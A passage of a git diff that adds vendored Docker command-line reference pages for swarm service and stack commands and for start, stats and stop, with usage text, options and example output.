
+ +```bash +$ docker service ls -f "id=0bcjw" +ID NAME MODE REPLICAS IMAGE +0bcjwfh8ychr redis replicated 1/1 redis:3.0.6 +``` + +#### Label + +The `label` filter matches services based on the presence of a `label` alone or +a `label` and a value. + +The following filter matches all services with a `project` label regardless of +its value: + +```bash +$ docker service ls --filter label=project +ID NAME MODE REPLICAS IMAGE +01sl1rp6nj5u frontend2 replicated 1/1 nginx:alpine +36xvvwwauej0 frontend replicated 5/5 nginx:alpine +74nzcxxjv6fq backend replicated 3/3 redis:3.0.6 +``` + +The following filter matches only services with the `project` label with the +`project-a` value. + +```bash +$ docker service ls --filter label=project=project-a +ID NAME MODE REPLICAS IMAGE +36xvvwwauej0 frontend replicated 5/5 nginx:alpine +74nzcxxjv6fq backend replicated 3/3 redis:3.0.6 +``` + +#### Name + +The `name` filter matches on all or part of a service's name. + +The following filter matches services with a name containing `redis`. 
+ +```bash +$ docker service ls --filter name=redis +ID NAME MODE REPLICAS IMAGE +0bcjwfh8ychr redis replicated 1/1 redis:3.0.6 +``` + +## Related information + +* [service create](service_create.md) +* [service inspect](service_inspect.md) +* [service logs](service_logs.md) +* [service rm](service_rm.md) +* [service scale](service_scale.md) +* [service ps](service_ps.md) +* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md new file mode 100644 index 0000000000..61abb15f67 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md @@ -0,0 +1,161 @@ +--- +title: "service ps" +description: "The service ps command description and usage" +keywords: "service, tasks, ps" +aliases: ["/engine/reference/commandline/service_tasks/"] +--- + + + +# service ps + +```Markdown +Usage: docker service ps [OPTIONS] SERVICE + +List the tasks of a service + +Options: + -f, --filter filter Filter output based on conditions provided + --help Print usage + --no-resolve Do not map IDs to Names + --no-trunc Do not truncate output + -q, --quiet Only display task IDs +``` + +Lists the tasks that are running as part of the specified service. This command +has to be run targeting a manager node. 
+ +## Examples + +### Listing the tasks that are part of a service + +The following command shows all the tasks that are part of the `redis` service: + +```bash +$ docker service ps redis + +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +0qihejybwf1x redis.1 redis:3.0.5 manager1 Running Running 8 seconds +bk658fpbex0d redis.2 redis:3.0.5 worker2 Running Running 9 seconds +5ls5s5fldaqg redis.3 redis:3.0.5 worker1 Running Running 9 seconds +8ryt076polmc redis.4 redis:3.0.5 worker1 Running Running 9 seconds +1x0v8yomsncd redis.5 redis:3.0.5 manager1 Running Running 8 seconds +71v7je3el7rr redis.6 redis:3.0.5 worker2 Running Running 9 seconds +4l3zm9b7tfr7 redis.7 redis:3.0.5 worker2 Running Running 9 seconds +9tfpyixiy2i7 redis.8 redis:3.0.5 worker1 Running Running 9 seconds +3w1wu13yupln redis.9 redis:3.0.5 manager1 Running Running 8 seconds +8eaxrb2fqpbn redis.10 redis:3.0.5 manager1 Running Running 8 seconds +``` + +In addition to _running_ tasks, the output also shows the task history. 
For +example, after updating the service to use the `redis:3.0.6` image, the output +may look like this: + +```bash +$ docker service ps redis + +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +50qe8lfnxaxk redis.1 redis:3.0.6 manager1 Running Running 6 seconds ago +ky2re9oz86r9 \_ redis.1 redis:3.0.5 manager1 Shutdown Shutdown 8 seconds ago +3s46te2nzl4i redis.2 redis:3.0.6 worker2 Running Running less than a second ago +nvjljf7rmor4 \_ redis.2 redis:3.0.6 worker2 Shutdown Rejected 23 seconds ago "No such image: redis@sha256:6…" +vtiuz2fpc0yb \_ redis.2 redis:3.0.5 worker2 Shutdown Shutdown 1 second ago +jnarweeha8x4 redis.3 redis:3.0.6 worker1 Running Running 3 seconds ago +vs448yca2nz4 \_ redis.3 redis:3.0.5 worker1 Shutdown Shutdown 4 seconds ago +jf1i992619ir redis.4 redis:3.0.6 worker1 Running Running 10 seconds ago +blkttv7zs8ee \_ redis.4 redis:3.0.5 worker1 Shutdown Shutdown 11 seconds ago +``` + +The number of items in the task history is determined by the +`--task-history-limit` option that was set when initializing the swarm. You can +change the task history retention limit using the +[`docker swarm update`](swarm_update.md) command. + +When deploying a service, docker resolves the digest for the service's +image, and pins the service to that digest. The digest is not shown by +default, but is printed if `--no-trunc` is used. 
The `--no-trunc` option +also shows the non-truncated task ID, and error-messages, as can be seen below; + +```bash +$ docker service ps --no-trunc redis + +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +50qe8lfnxaxksi9w2a704wkp7 redis.1 redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842 manager1 Running Running 5 minutes ago +ky2re9oz86r9556i2szb8a8af \_ redis.1 redis:3.0.5@sha256:f8829e00d95672c48c60f468329d6693c4bdd28d1f057e755f8ba8b40008682e worker2 Shutdown Shutdown 5 minutes ago +bk658fpbex0d57cqcwoe3jthu redis.2 redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842 worker2 Running Running 5 seconds +nvjljf7rmor4htv7l8rwcx7i7 \_ redis.2 redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842 worker2 Shutdown Rejected 5 minutes ago "No such image: redis@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842" +``` + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there +is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). +Multiple filter flags are combined as an `OR` filter. For example, +`-f name=redis.1 -f name=redis.7` returns both `redis.1` and `redis.7` tasks. + +The currently supported filters are: + +* [id](#id) +* [name](#name) +* [node](#node) +* [desired-state](#desired-state) + + +#### ID + +The `id` filter matches on all or a prefix of a task's ID. + +```bash +$ docker service ps -f "id=8" redis + +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +8ryt076polmc redis.4 redis:3.0.6 worker1 Running Running 9 seconds +8eaxrb2fqpbn redis.10 redis:3.0.6 manager1 Running Running 8 seconds +``` + +#### Name + +The `name` filter matches on task names. 
+ +```bash +$ docker service ps -f "name=redis.1" redis +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +qihejybwf1x5 redis.1 redis:3.0.6 manager1 Running Running 8 seconds +``` + + +#### Node + +The `node` filter matches on a node name or a node ID. + +```bash +$ docker service ps -f "node=manager1" redis +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +0qihejybwf1x redis.1 redis:3.0.6 manager1 Running Running 8 seconds +1x0v8yomsncd redis.5 redis:3.0.6 manager1 Running Running 8 seconds +3w1wu13yupln redis.9 redis:3.0.6 manager1 Running Running 8 seconds +8eaxrb2fqpbn redis.10 redis:3.0.6 manager1 Running Running 8 seconds +``` + + +#### desired-state + +The `desired-state` filter can take the values `running`, `shutdown`, and `accepted`. + + +## Related information + +* [service create](service_create.md) +* [service inspect](service_inspect.md) +* [service logs](service_logs.md) +* [service ls](service_ls.md) +* [service rm](service_rm.md) +* [service scale](service_scale.md) +* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md new file mode 100644 index 0000000000..d0ba90b26d --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md @@ -0,0 +1,55 @@ +--- +title: "service rm" +description: "The service rm command description and usage" +keywords: "service, rm" +--- + + + +# service rm + +```Markdown +Usage: docker service rm SERVICE [SERVICE...] + +Remove one or more services + +Aliases: + rm, remove + +Options: + --help Print usage +``` + +Removes the specified services from the swarm. This command has to be run +targeting a manager node. 
+ +For example, to remove the redis service: + +```bash +$ docker service rm redis +redis +$ docker service ls +ID NAME MODE REPLICAS IMAGE +``` + +> **Warning**: Unlike `docker rm`, this command does not ask for confirmation +> before removing a running service. + + + +## Related information + +* [service create](service_create.md) +* [service inspect](service_inspect.md) +* [service logs](service_logs.md) +* [service ls](service_ls.md) +* [service scale](service_scale.md) +* [service ps](service_ps.md) +* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md new file mode 100644 index 0000000000..64075ed092 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md @@ -0,0 +1,96 @@ +--- +title: "service scale" +description: "The service scale command description and usage" +keywords: "service, scale" +--- + + + +# service scale + +```markdown +Usage: docker service scale SERVICE=REPLICAS [SERVICE=REPLICAS...] + +Scale one or multiple replicated services + +Options: + --help Print usage +``` + +## Examples + +### Scale a service + +The scale command enables you to scale one or more replicated services either up +or down to the desired number of replicas. This command cannot be applied on +services which are global mode. The command will return immediately, but the +actual scaling of the service may take some time. To stop all replicas of a +service while keeping the service active in the swarm you can set the scale to 0. + +For example, the following command scales the "frontend" service to 50 tasks. + +```bash +$ docker service scale frontend=50 +frontend scaled to 50 +``` + +The following command tries to scale a global service to 10 tasks and returns an error. 
+ +``` +$ docker service create --mode global --name backend backend:latest +b4g08uwuairexjub6ome6usqh +$ docker service scale backend=10 +backend: scale can only be used with replicated mode +``` + +Directly afterwards, run `docker service ls`, to see the actual number of +replicas. + +```bash +$ docker service ls --filter name=frontend + +ID NAME MODE REPLICAS IMAGE +3pr5mlvu3fh9 frontend replicated 15/50 nginx:alpine +``` + +You can also scale a service using the [`docker service update`](service_update.md) +command. The following commands are equivalent: + +```bash +$ docker service scale frontend=50 +$ docker service update --replicas=50 frontend +``` + +### Scale multiple services + +The `docker service scale` command allows you to set the desired number of +tasks for multiple services at once. The following example scales both the +backend and frontend services: + +```bash +$ docker service scale backend=3 frontend=5 +backend scaled to 3 +frontend scaled to 5 + +$ docker service ls +ID NAME MODE REPLICAS IMAGE +3pr5mlvu3fh9 frontend replicated 5/5 nginx:alpine +74nzcxxjv6fq backend replicated 3/3 redis:3.0.6 +``` + +## Related information + +* [service create](service_create.md) +* [service inspect](service_inspect.md) +* [service logs](service_logs.md) +* [service ls](service_ls.md) +* [service rm](service_rm.md) +* [service ps](service_ps.md) +* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md new file mode 100644 index 0000000000..301a0eabe8 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md @@ -0,0 +1,181 @@ +--- +title: "service update" +description: "The service update command description and usage" +keywords: "service, update" +--- + + + +# service update + +```Markdown +Usage: docker service update [OPTIONS] SERVICE + +Update a service + +Options: + 
--args string Service command args + --constraint-add list Add or update a placement constraint (default []) + --constraint-rm list Remove a constraint (default []) + --container-label-add list Add or update a container label (default []) + --container-label-rm list Remove a container label by its key (default []) + --dns-add list Add or update a custom DNS server (default []) + --dns-option-add list Add or update a DNS option (default []) + --dns-option-rm list Remove a DNS option (default []) + --dns-rm list Remove a custom DNS server (default []) + --dns-search-add list Add or update a custom DNS search domain (default []) + --dns-search-rm list Remove a DNS search domain (default []) + --endpoint-mode string Endpoint mode (vip or dnsrr) + --env-add list Add or update an environment variable (default []) + --env-rm list Remove an environment variable (default []) + --force Force update even if no changes require it + --group-add list Add an additional supplementary user group to the container (default []) + --group-rm list Remove a previously added supplementary user group from the container (default []) + --health-cmd string Command to run to check health + --health-interval duration Time between running the check (ns|us|ms|s|m|h) + --health-retries int Consecutive failures needed to report unhealthy + --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) + --help Print usage + --host-add list Add or update a custom host-to-IP mapping (host:ip) (default []) + --host-rm list Remove a custom host-to-IP mapping (host:ip) (default []) + --hostname string Container hostname + --image string Service image tag + --label-add list Add or update a service label (default []) + --label-rm list Remove a label by its key (default []) + --limit-cpu decimal Limit CPUs (default 0.000) + --limit-memory bytes Limit Memory (default 0 B) + --log-driver string Logging driver for service + --log-opt list Logging driver options (default []) + --mount-add 
mount Add or update a mount on a service + --mount-rm list Remove a mount by its target path (default []) + --no-healthcheck Disable any container-specified HEALTHCHECK + --publish-add port Add or update a published port + --publish-rm port Remove a published port by its target port + --replicas uint Number of tasks + --reserve-cpu decimal Reserve CPUs (default 0.000) + --reserve-memory bytes Reserve Memory (default 0 B) + --restart-condition string Restart when condition is met (none, on-failure, or any) + --restart-delay duration Delay between restart attempts (ns|us|ms|s|m|h) + --restart-max-attempts uint Maximum number of restarts before giving up + --restart-window duration Window used to evaluate the restart policy (ns|us|ms|s|m|h) + --rollback Rollback to previous specification + --secret-add secret Add or update a secret on a service + --secret-rm list Remove a secret (default []) + --stop-grace-period duration Time to wait before force killing a container (ns|us|ms|s|m|h) + -t, --tty Allocate a pseudo-TTY + --update-delay duration Delay between updates (ns|us|ms|s|m|h) (default 0s) + --update-failure-action string Action on update failure (pause|continue) (default "pause") + --update-max-failure-ratio float Failure rate to tolerate during an update + --update-monitor duration Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s) + --update-parallelism uint Maximum number of tasks updated simultaneously (0 to update all at once) (default 1) + -u, --user string Username or UID (format: [:]) + --with-registry-auth Send registry authentication details to swarm agents + -w, --workdir string Working directory inside the container +``` + +Updates a service as described by the specified parameters. This command has to be run targeting a manager node. +The parameters are the same as [`docker service create`](service_create.md). Please look at the description there +for further information. 
+
+Normally, updating a service will only cause the service's tasks to be replaced with new ones if a change to the
+service requires recreating the tasks for it to take effect. For example, only changing the
+`--update-parallelism` setting will not recreate the tasks, because the individual tasks are not affected by this
+setting. However, the `--force` flag will cause the tasks to be recreated anyway. This can be used to perform a
+rolling restart without any changes to the service parameters.
+
+## Examples
+
+### Update a service
+
+```bash
+$ docker service update --limit-cpu 2 redis
+```
+
+### Perform a rolling restart with no parameter changes
+
+```bash
+$ docker service update --force --update-parallelism 1 --update-delay 30s redis
+```
+
+In this example, the `--force` flag causes the service's tasks to be shut down
+and replaced with new ones even though none of the other parameters would
+normally cause that to happen. The `--update-parallelism 1` setting ensures
+that only one task is replaced at a time (this is the default behavior). The
+`--update-delay 30s` setting introduces a 30 second delay between tasks, so
+that the rolling restart happens gradually.
+
+### Adding and removing mounts
+
+Use the `--mount-add` or `--mount-rm` options to add or remove a service's bind-mounts
+or volumes.
+
+The following example creates a service which mounts the `test-data` volume to
+`/somewhere`. The next step updates the service to also mount the `other-volume`
+volume to `/somewhere-else`. The last step unmounts the `/somewhere` mount
+point, effectively removing the `test-data` volume. Each command returns the
+service name.
+
+- The `--mount-add` flag takes the same parameters as the `--mount` flag on
+  `service create`. Refer to the [volumes and
+  bind-mounts](service_create.md#volumes-and-bind-mounts-mount) section in the
+  `service create` reference for details.
+
+- The `--mount-rm` flag takes the `target` path of the mount.
+ +```bash +$ docker service create \ + --name=myservice \ + --mount \ + type=volume,source=test-data,target=/somewhere \ + nginx:alpine \ + myservice + +myservice + +$ docker service update \ + --mount-add \ + type=volume,source=other-volume,target=/somewhere-else \ + myservice + +myservice + +$ docker service update --mount-rm /somewhere myservice + +myservice +``` + +### Adding and removing secrets + +Use the `--secret-add` or `--secret-rm` options add or remove a service's +secrets. + +The following example adds a secret named `ssh-2` and removes `ssh-1`: + +```bash +$ docker service update \ + --secret-add source=ssh-2,target=ssh-2 \ + --secret-rm ssh-1 \ + myservice +``` + +### Update services using templates + +Some flags of `service update` support the use of templating. +See [`service create`](./service_create.md#templating) for the reference. + +## Related information + +* [service create](service_create.md) +* [service inspect](service_inspect.md) +* [service logs](service_logs.md) +* [service ls](service_ls.md) +* [service ps](service_ps.md) +* [service rm](service_rm.md) +* [service scale](service_scale.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md new file mode 100644 index 0000000000..037feaebd7 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md @@ -0,0 +1,98 @@ +--- +title: "stack deploy" +description: "The stack deploy command description and usage" +keywords: "stack, deploy, up" +--- + + + +# stack deploy + +```markdown +Usage: docker stack deploy [OPTIONS] STACK + +Deploy a new stack or update an existing stack + +Aliases: + deploy, up + +Options: + --bundle-file string Path to a Distributed Application Bundle file + -c, --compose-file string Path to a Compose file + --help Print usage + --with-registry-auth Send registry authentication details to Swarm agents +``` + +Create and 
update a stack from a `compose` or a `dab` file on the swarm. This command +has to be run targeting a manager node. + +## Compose file + +The `deploy` command supports compose file version `3.0` and above." + +```bash +$ docker stack deploy --compose-file docker-compose.yml vossibility +Ignoring unsupported options: links + +Creating network vossibility_vossibility +Creating network vossibility_default +Creating service vossibility_nsqd +Creating service vossibility_logstash +Creating service vossibility_elasticsearch +Creating service vossibility_kibana +Creating service vossibility_ghollector +Creating service vossibility_lookupd +``` + +You can verify that the services were correctly created + +``` +$ docker service ls +ID NAME MODE REPLICAS IMAGE +29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa +7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 +9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe +axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba +``` + +## DAB file + +```bash +$ docker stack deploy --bundle-file vossibility-stack.dab vossibility +Loading bundle from vossibility-stack.dab +Creating service vossibility_elasticsearch +Creating service vossibility_kibana +Creating service vossibility_logstash +Creating service vossibility_lookupd +Creating service vossibility_nsqd +Creating service vossibility_vossibility-collector +``` + +You can verify 
that the services were correctly created: + +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa +7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 +9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe +axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba +``` + +## Related information + +* [stack ls](stack_ls.md) +* [stack ps](stack_ps.md) +* [stack rm](stack_rm.md) +* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md new file mode 100644 index 0000000000..05c7215492 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md @@ -0,0 +1,47 @@ +--- +title: "stack ls" +description: "The stack ls command description and usage" +keywords: "stack, ls" +--- + + + +# stack ls + +```markdown +Usage: docker stack ls + +List stacks + +Aliases: + ls, list + +Options: + --help Print usage +``` + +Lists the stacks. 
+ +For example, the following command shows all stacks and some additional information: + +```bash +$ docker stack ls + +ID SERVICES +vossibility-stack 6 +myapp 2 +``` + +## Related information + +* [stack deploy](stack_deploy.md) +* [stack ps](stack_ps.md) +* [stack rm](stack_rm.md) +* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md new file mode 100644 index 0000000000..101e9feb11 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md @@ -0,0 +1,51 @@ +--- +title: "stack ps" +description: "The stack ps command description and usage" +keywords: "stack, ps" +--- + + + +# stack ps + +```markdown +Usage: docker stack ps [OPTIONS] STACK + +List the tasks in the stack + +Options: + -f, --filter filter Filter output based on conditions provided + --help Print usage + --no-resolve Do not map IDs to Names + --no-trunc Do not truncate output +``` + +Lists the tasks that are running as part of the specified stack. This +command has to be run targeting a manager node. + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there +is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). +Multiple filter flags are combined as an `OR` filter. For example, +`-f name=redis.1 -f name=redis.7` returns both `redis.1` and `redis.7` tasks. 
+ +The currently supported filters are: + +* id +* name +* desired-state + +## Related information + +* [stack deploy](stack_deploy.md) +* [stack ls](stack_ls.md) +* [stack rm](stack_rm.md) +* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md new file mode 100644 index 0000000000..fd639978ec --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md @@ -0,0 +1,38 @@ +--- +title: "stack rm" +description: "The stack rm command description and usage" +keywords: "stack, rm, remove, down" +--- + + + +# stack rm + +```markdown +Usage: docker stack rm STACK + +Remove the stack + +Aliases: + rm, remove, down + +Options: + --help Print usage +``` + +Remove the stack from the swarm. This command has to be run targeting +a manager node. + +## Related information + +* [stack deploy](stack_deploy.md) +* [stack ls](stack_ls.md) +* [stack ps](stack_ps.md) +* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md new file mode 100644 index 0000000000..62779b4aa1 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md @@ -0,0 +1,70 @@ +--- +title: "stack services" +description: "The stack services command description and usage" +keywords: "stack, services" +advisory: "experimental" +--- + + + +# stack services (experimental) + +```markdown +Usage: docker stack services [OPTIONS] STACK + +List the services in the stack + +Options: + -f, --filter value Filter output based on conditions provided + --help Print usage + -q, --quiet Only display IDs +``` + +Lists the services that are running as part of the specified stack. This +command has to be run targeting a manager node. 
+ +For example, the following command shows all services in the `myapp` stack: + +```bash +$ docker stack services myapp + +ID NAME REPLICAS IMAGE COMMAND +7be5ei6sqeye myapp_web 1/1 nginx@sha256:23f809e7fd5952e7d5be065b4d3643fbbceccd349d537b62a123ef2201bc886f +dn7m7nhhfb9y myapp_db 1/1 mysql@sha256:a9a5b559f8821fe73d58c3606c812d1c044868d42c63817fa5125fd9d8b7b539 +``` + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there +is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). +Multiple filter flags are combined as an `OR` filter. + +The following command shows both the `web` and `db` services: + +```bash +$ docker stack services --filter name=myapp_web --filter name=myapp_db myapp + +ID NAME REPLICAS IMAGE COMMAND +7be5ei6sqeye myapp_web 1/1 nginx@sha256:23f809e7fd5952e7d5be065b4d3643fbbceccd349d537b62a123ef2201bc886f +dn7m7nhhfb9y myapp_db 1/1 mysql@sha256:a9a5b559f8821fe73d58c3606c812d1c044868d42c63817fa5125fd9d8b7b539 +``` + +The currently supported filters are: + +* id / ID (`--filter id=7be5ei6sqeye`, or `--filter ID=7be5ei6sqeye`) +* name (`--filter name=myapp_web`) +* label (`--filter label=key=value`) + +## Related information + +* [stack deploy](stack_deploy.md) +* [stack ls](stack_ls.md) +* [stack ps](stack_ps.md) +* [stack rm](stack_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/start.md b/vendor/github.com/docker/docker/docs/reference/commandline/start.md new file mode 100644 index 0000000000..980bce9585 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/start.md @@ -0,0 +1,28 @@ +--- +title: "start" +description: "The start command description and usage" +keywords: "Start, container, stopped" +--- + + + +# start + +```markdown +Usage: docker start [OPTIONS] CONTAINER [CONTAINER...] 
+ +Start one or more stopped containers + +Options: + -a, --attach Attach STDOUT/STDERR and forward signals + --detach-keys string Override the key sequence for detaching a container + --help Print usage + -i, --interactive Attach container's STDIN +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stats.md b/vendor/github.com/docker/docker/docs/reference/commandline/stats.md new file mode 100644 index 0000000000..f5d0d54f35 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stats.md @@ -0,0 +1,117 @@ +--- +title: "stats" +description: "The stats command description and usage" +keywords: "container, resource, statistics" +--- + + + +# stats + +```markdown +Usage: docker stats [OPTIONS] [CONTAINER...] + +Display a live stream of container(s) resource usage statistics + +Options: + -a, --all Show all containers (default shows just running) + --format string Pretty-print images using a Go template + --help Print usage + --no-stream Disable streaming stats and only pull the first result +``` + +The `docker stats` command returns a live data stream for running containers. To limit data to one or more specific containers, specify a list of container names or ids separated by a space. You can specify a stopped container but stopped containers do not return any data. + +If you want more detailed information about a container's resource usage, use the `/containers/(id)/stats` API endpoint. + +## Examples + +Running `docker stats` on all running containers against a Linux daemon. + + $ docker stats + CONTAINER CPU % MEM USAGE / LIMIT MEM % NET I/O BLOCK I/O + 1285939c1fd3 0.07% 796 KiB / 64 MiB 1.21% 788 B / 648 B 3.568 MB / 512 KB + 9c76f7834ae2 0.07% 2.746 MiB / 64 MiB 4.29% 1.266 KB / 648 B 12.4 MB / 0 B + d1ea048f04e4 0.03% 4.583 MiB / 64 MiB 6.30% 2.854 KB / 648 B 27.7 MB / 0 B + +Running `docker stats` on multiple containers by name and id against a Linux daemon. 
+ + $ docker stats fervent_panini 5acfcb1b4fd1 + CONTAINER CPU % MEM USAGE/LIMIT MEM % NET I/O + 5acfcb1b4fd1 0.00% 115.2 MiB/1.045 GiB 11.03% 1.422 kB/648 B + fervent_panini 0.02% 11.08 MiB/1.045 GiB 1.06% 648 B/648 B + +Running `docker stats` on all running containers against a Windows daemon. + + PS E:\> docker stats + CONTAINER CPU % PRIV WORKING SET NET I/O BLOCK I/O + 09d3bb5b1604 6.61% 38.21 MiB 17.1 kB / 7.73 kB 10.7 MB / 3.57 MB + 9db7aa4d986d 9.19% 38.26 MiB 15.2 kB / 7.65 kB 10.6 MB / 3.3 MB + 3f214c61ad1d 0.00% 28.64 MiB 64 kB / 6.84 kB 4.42 MB / 6.93 MB + +Running `docker stats` on multiple containers by name and id against a Windows daemon. + + PS E:\> docker ps -a + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + 3f214c61ad1d nanoserver "cmd" 2 minutes ago Up 2 minutes big_minsky + 9db7aa4d986d windowsservercore "cmd" 2 minutes ago Up 2 minutes mad_wilson + 09d3bb5b1604 windowsservercore "cmd" 2 minutes ago Up 2 minutes affectionate_easley + + PS E:\> docker stats 3f214c61ad1d mad_wilson + CONTAINER CPU % PRIV WORKING SET NET I/O BLOCK I/O + 3f214c61ad1d 0.00% 46.25 MiB 76.3 kB / 7.92 kB 10.3 MB / 14.7 MB + mad_wilson 9.59% 40.09 MiB 27.6 kB / 8.81 kB 17 MB / 20.1 MB + +## Formatting + +The formatting option (`--format`) pretty prints container output +using a Go template. + +Valid placeholders for the Go template are listed below: + +Placeholder | Description +------------ | -------------------------------------------- +`.Container` | Container name or ID (user input) +`.Name` | Container name +`.ID` | Container ID +`.CPUPerc` | CPU percentage +`.MemUsage` | Memory usage +`.NetIO` | Network IO +`.BlockIO` | Block IO +`.MemPerc` | Memory percentage (Not available on Windows) +`.PIDs` | Number of PIDs (Not available on Windows) + + +When using the `--format` option, the `stats` command either +outputs the data exactly as the template declares or, when using the +`table` directive, includes column headers as well. 
+ +The following example uses a template without headers and outputs the +`Container` and `CPUPerc` entries separated by a colon for all images: + +```bash +$ docker stats --format "{{.Container}}: {{.CPUPerc}}" + +09d3bb5b1604: 6.61% +9db7aa4d986d: 9.19% +3f214c61ad1d: 0.00% +``` + +To list all containers statistics with their name, CPU percentage and memory +usage in a table format you can use: + +```bash +$ docker stats --format "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}" + +CONTAINER CPU % PRIV WORKING SET +1285939c1fd3 0.07% 796 KiB / 64 MiB +9c76f7834ae2 0.07% 2.746 MiB / 64 MiB +d1ea048f04e4 0.03% 4.583 MiB / 64 MiB +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stop.md b/vendor/github.com/docker/docker/docs/reference/commandline/stop.md new file mode 100644 index 0000000000..3090db98ae --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stop.md @@ -0,0 +1,29 @@ +--- +title: "stop" +description: "The stop command description and usage" +keywords: "stop, SIGKILL, SIGTERM" +--- + + + +# stop + +```markdown +Usage: docker stop [OPTIONS] CONTAINER [CONTAINER...] + +Stop one or more running containers + +Options: + --help Print usage + -t, --time int Seconds to wait for stop before killing it (default 10) +``` + +The main process inside the container will receive `SIGTERM`, and after a grace +period, `SIGKILL`. 
